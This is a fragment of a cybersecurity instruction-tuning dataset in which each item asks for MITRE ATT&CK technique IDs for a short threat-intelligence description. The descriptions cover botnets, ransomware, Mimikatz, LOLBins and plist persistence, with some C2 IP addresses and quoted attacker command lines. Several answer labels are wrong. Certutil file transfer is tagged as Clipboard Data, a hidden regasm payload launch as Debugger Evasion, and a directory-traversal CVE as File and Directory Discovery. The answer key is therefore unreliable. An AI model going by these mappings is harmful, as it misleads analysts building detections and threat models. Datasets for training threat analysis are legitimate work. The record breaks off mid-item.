private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and mettle open source control module.. Hajime: This round of update from Hajime also includes GPON exploits.. Two Mirai variants: At least two malicious campaigns are actively exploiting this vulnerability to propagate mirai variants. The second one is already known as Omni.. Imgay: This looks like a botnet under development. We only observe its download behavior and no more follow-up actions.", + "output": "- T1595.002: Active Scanning - Vulnerability Scanning\n- T1203: Exploitation for Client Execution\n- T1587.004: Develop Capabilities - Exploits\n- T1588.006: Obtain Capabilities - Vulnerabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely invoke an encoded PowerShell command on target systems to execute the payload", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attempts to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking.", + "output": "- T1110.002: Brute Force - Password Cracking\n- T1003.008: OS Credential Dumping - /etc/passwd and /etc/shadow" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Unit 42 has been tracking an APT campaign we name TiltedTemple, which we first identified in connection with its use of the Zoho ManageEngine ADSelfService Plus vulnerability CVE-2021-40539 and ServiceDesk Plus vulnerability CVE-2021-44077.", + "output": "- T1588.006: Obtain Capabilities - Vulnerabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Vidar is an info-stealer. It downloads DLL files freebl3.dll, mozglue.dll, msvcp140.dll, nss3.dll, softokn3.dll and vcruntime140.dll from its C&C for use in password-grabbing routines.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DanaBot is a modular malware that includes various additional modules; the most popular functionalities of these modules are stealing information from compromised machines and injecting fake forms into popular ecommerce and social media sites to collect payment data. It can also provide full access to infected systems with remote desktop, or mouse and keyboard access by utilizing a VNC plugin.", + "output": "- T1021.005: Remote Services - VNC\n- T1592: Gather Victim Host Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QAKBOT can use Regsvr32 to execute malicious DLLs", + "output": "- T1588.002: Obtain Capabilities - Tool\n- T1218.010: System Binary Proxy Execution - Regsvr32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LockBit 2.0 has been seen utilizing numerous tools to dump passwords from password stores and Chrome using GrabChrome and GrabRFF.", + "output": "- T1555: Credentials from Password Stores" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Further reconnaissance is performed in the environment to identify privileged users. First, the built-in net.exe and nltest.exe are used.", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Volexity reported yesterday that its analysts had identified approximately 1,600 ZCS servers that they believe were compromised by threat actors leveraging CVE-2022-41352 to plant webshells", + "output": "- T1588.006: Obtain Capabilities - Vulnerabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PrivateLoader is yet another example of a Pay-Per-Install malicious loader like LgoogLoader and SmokeLoader. It uses a single-byte XOR encryption key to receive URLs from the control center.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MedusaLocker is a ransomware family that was first seen in the wild in early October 2019. In January 2020, a fork of MedusaLocker named Ako was observed, which has been updated to support the use of a Tor hidden service to facilitate a RaaS model. Operators of the Ako version of the malware have since implemented a DLS (Figure 12). At least nine victims have been published to the site since its inception.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "However, the program turned out not to be a Gpcode variant. This new version of Bancos.aam turned out to be the first Trojan spy program designed to steal data from users of the Russian QUIK system. ", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CVE-2018-4878 was the second most commonly observed vulnerability and is the only Adobe Flash Player vulnerability on this year\u2019s top 10. Like CVE-2018-8174, this vulnerability was included in multiple exploit kits, most notably the Fallout exploit kit, which was used to distribute GandCrab ransomware. Fallout took its name and URI patterns from the now defunct Nuclear exploit kit, which had been associated with CVE-2015-7645, one of 2016\u2019s top 10 vulnerabilities. In 2018, Fallout was last selling for $300 a week and $1,100 a month, as seen below.", + "output": "- T1203: Exploitation for Client Execution\n- T1588.005: Obtain Capabilities - Exploits" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.. On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.. In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.. In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"\"testWormDLL\"\" that is a statically compiled copy of the popular XMRig Monero miner.. On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.\"", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kaspersky Lab detections for Blue, Black, and Green Lamberts have been triggered by a relatively small set of victims from around the world. \u00a0While investigating one of these infections involving White Lambert (network-driven implant) and Blue Lambert (active implant), we found yet another family of tools that appear to be related. \u00a0We called this new family \u2018Pink Lambert\u2019.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In most cases, UNC2165 has stolen data from its victims to use as leverage for extortion after it has deployed ransomware across an environment. In intrusions where the data exfiltration method could be identified, there is evidence to suggest the group used either Rclone or MEGASync to transfer data from the victims' environments prior to encryption. The Rclone utility is used by many financially motivated actors to synchronize sensitive files with cloud storage providers, and MEGASync synchronizes data to the MEGA cloud hosting service.", + "output": "- T1537: Transfer Data to Cloud Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Ryuk group went from an email to domain wide ransomware in 29 hours and asked for over $6 million to unlock our systems. They used tools such as Cobalt Strike, AdFind, WMI, vsftpd, PowerShell, PowerView, and Rubeus to accomplish their objective.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Uploads a file on the victim\u2019s computer to the C&C server", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Uses Mimikatz to harvest credentials.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Uses legitimate VPN or Citrix credentials to maintain access to an environment.", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The group abuses common cloud services such as Dropbox, OneDrive, and Mega for C&C communications (receive commands and exfiltrate data).", + "output": "- T1136.003: Create Account - Cloud Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Uses 7-Zip to compress stolen data for exfiltration.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stolen digital certificate re-use", + "output": "- T1588.004: Obtain Capabilities - Digital Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Exploits Print Nightmare vulnerability.", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Even more, this tiny bootkit with a size of only 80 kb on disk after installation can disable built-in Windows security protection such as Hypervisor-Protected Code Integrity (HVCI) and Windows Defender and bypass User Account Control (UAC).", + "output": "- T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Most PowerShell scripts involved in LockBit 2.0 cases are Base64 encoded.", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Although Cobalt Strike has many capabilities beneficial to threat actors in ransomware attacks, it was mainly seen in LockBit 2.0 investigations acting as a command and control beacon, a method of lateral movement and a tool for downloading/executing files.", + "output": "- T1021: Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been observed: \uf0b7 Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI). \uf0b7 Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \uf0b7 Employing Python scripts to exploit vulnerable servers. \uf0b7 Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.", + "output": "- T1059.007: Command and Scripting Interpreter - JavaScript\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- T1059.008: Command and Scripting Interpreter - Network Device CLI\n- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1059.006: Command and Scripting Interpreter - Python\n- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been observed deleting files using rm or del commands. Several files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actors used a variety of utilities, including publicly available versions of WinRAR\u00ae , to archive collected data with password protection.", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The actors used certutil.exe, a known Living Off the Land\"\" technique, to transfer a file into a target environment.\"\"\"", + "output": "- T1115: Clipboard Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The part of the malicious code that drops and executes a payload is nearly identical between the two samples. The legitimate Windows executable C:\\Windows\\System32\\colorcpl.exe is copied to the new directory C:\\ProgramData\\PackageColor and the embedded payload is written to C:\\ProgramData\\PackageColor\\colorui.dll.", + "output": "- T1218: System Binary Proxy Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Either via the LNK after startup, or directly via the VBS, the command line \u201cwscript.exe //B //E:vbs C:\\Users\\Public\\Favorites\\desktop.ini\u201d is executed, referencing the helper file dropped by the sample mentioned above. Finally, the file C:\\Users\\Public\\ignit.vbs is deleted after execution.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\u201cdesktop.ini\u201d is used to invoke regasm.exe to launch the payload found in C:\\Users\\Public\\Libraries\\core.dll as a hidden window without returning any error codes.", + "output": "- T1622: Debugger Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Chrome extension is installed and maintained by a number of plist files written to the user directory ~/Library/LaunchAgent/. To conceal the malicious behavior, the underlying commands in the plist files are obfuscated with Base64 encoding.", + "output": "- T1647: Plist File Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first plist, ~/Library/LaunchAgents/com.safarii.extension.plist, does not use a StartInterval value like the Chrome variant, but instead uses RunAtLoad. The RunAtLoad parameter is executed when the user logs into their computer. Note that the plist file does not use the correct spelling of Safari. ", + "output": "- T1647: Plist File Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An attacker runs the MimiKatz tool and launches a DCShadow attack (lsadump::dcshadow)", + "output": "- T1207: Rogue Domain Controller" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Nefilim ransomware uses a batch file to stop services and kill processes in the local host. This batch file abuses taskill.exe using CMD to kill predefined services and processes in the target host. Nefilim distributes this batch file to multiple hosts using two batch files. One of the batch files uses the \u2018copy\u2019 command, and the other one uses WMI with hard-coded admin credentials.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To facilitate the staging of BEACON on remote systems APT29 utilized a malicious certificate that allowed the group to impersonate a privileged user.", + "output": "- T1588.004: Obtain Capabilities - Digital Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We believe that the modified library file, which we\u2019ve named LOCKPICK, could weaken encryption for communications used by the appliance, but do not have enough evidence to confirm this", + "output": "- T1600: Weaken Encryption" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of 